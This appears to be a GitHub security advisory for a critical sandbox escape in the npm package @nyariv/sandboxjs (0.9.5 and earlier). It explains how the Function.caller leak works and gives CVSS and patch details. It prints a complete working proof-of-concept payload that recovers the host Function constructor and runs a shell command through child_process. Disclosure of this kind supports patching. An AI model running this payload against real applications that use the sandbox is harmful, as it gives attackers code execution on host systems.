SandboxJS has a sandbox escape via Function.caller leakage of internal call op

Description

Summary

Sandbox-defined functions expose Function.caller, allowing sandboxed code to recover the internal LispType.Call runtime callback. That callback can then be invoked with attacker-controlled fake context and obj values to extract blocked host statics, recover the real host Function constructor, and execute arbitrary host JavaScript.

Details

The vulnerability is in the property access logic registered via addOps in prop.ts. Sandboxed code could access the caller, callee, and arguments properties on functions. In the CommonJS build, this allowed sandboxed code to read Function.caller and leak a privileged internal LispType.Call callback.

In executorUtils.ts createFunction() constructs normal host JS functions, and because these are ordinary host functions, sandbox code can observe:

function f(){ return f.caller }

That leaks the host-side callback that invoked the sandbox function. This leaked callback is the internal LispType.Call op, which is registered in call.ts. The escape was possible because the LispType.Call handler accepts a params object from the attacker and uses its fields without authenticating that they came from the executor. if you looked at those branches call.ts:47, call.ts:70, call.ts:149. This means the attacker controls obj.context, obj.prop, obj.get, context.evals.get and a. This can lead to direct invocation of an internal primitive with forged operands

PoC

const sandb = require('@nyariv/sandboxjs').default;
const sand = new sandb(); 

const payload = `
const callOp = (function fn() { return fn.caller; })();

function makeContext(capture = () => {}) {
  return { ctx: { options: 0 }, evals: { get: capture } };
}

function leakStatic(obj, prop) {
  let leaked;
  callOp({
    done() {},
    a() {},
    b: [],
    obj: { context: obj, prop, get() {} },
    context: makeContext((fn) => (leaked = fn, () => 1))
  });
  return leaked;
}

function callDirect(fn, args) {
  let value;
  callOp({
    done(_, result) { value = result; },
    a() {},
    b: args,
    obj: fn,
    context: makeContext()
  });
  return value;
}

callDirect(leakStatic(Object, 'defineProperty'), [
  leakStatic,
  'call',
  callDirect(leakStatic(Object, 'getOwnPropertyDescriptor'), [
    callDirect(leakStatic(Object, 'getPrototypeOf'), [() => 0]),
    'constructor'
  ])
]);

let hostFn;
callOp({
  done(_, result) { hostFn = result; },
  a: leakStatic,
  b: [],
  obj: {
    context: 'return process.getBuiltinModule("child_process").execSync("whoami").toString()',
    get() {}
  },
  context: makeContext()
});

return hostFn();
`;

console.log(sand.compile(payload)().run());

Impact

Sandbox escape leads to RCE

Basic information

Type
reviewed
Severity
critical
Advisory on GitHub
Open advisory ↗
Repository advisory
Open repository advisory ↗
Source code
Browse source ↗
Published (advisory)
2026-05-11 19:40:00 UTC
Updated
2026-06-09 02:01:00 UTC
GitHub reviewed
2026-05-11 19:40:00 UTC
NVD published
2026-05-28

EPSS Score

Score Percentile
0.06% 19.36%

CVSS Scores

Base score Version Severity Vector
10.0 3.1
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H Click to expand
Attack vector (AV:N)
Could be attacked over the internet or any normal routed network—not just someone sitting at the machine.
Attack complexity (AC:L)
Once they can reach the bug, pulling it off is straightforward—no weird race conditions or rare setup.
Privileges required (PR:N)
No account or special rights needed—anonymous or random user is enough.
User interaction (UI:N)
Nobody has to click “OK” or open a trap file; it can work without a victim helping.
Scope (S:C)
Breaking this can reach past the original component and bite other resources—bigger blast radius.
Confidentiality (C:H)
Serious risk that confidential data gets exposed in a big way.
Integrity (I:H)
They could widely tamper with or forge data—trust in the data is badly hurt.
Availability (A:H)
Could take the service down hard or make it unusable for people who depend on it.

Identifiers

CWEs

CWE id Name
CWE-94 Improper Control of Generation of Code ('Code Injection')

Credits

  • Macabely (reporter)

Affected packages (1)

Vulnerable version ranges and first patched releases as published by GitHub.

Ecosystem Package Vulnerable range First patched Vulnerable functions
npm @nyariv/sandboxjs <= 0.9.5 0.9.6

References

cvelogic Threat Intelligence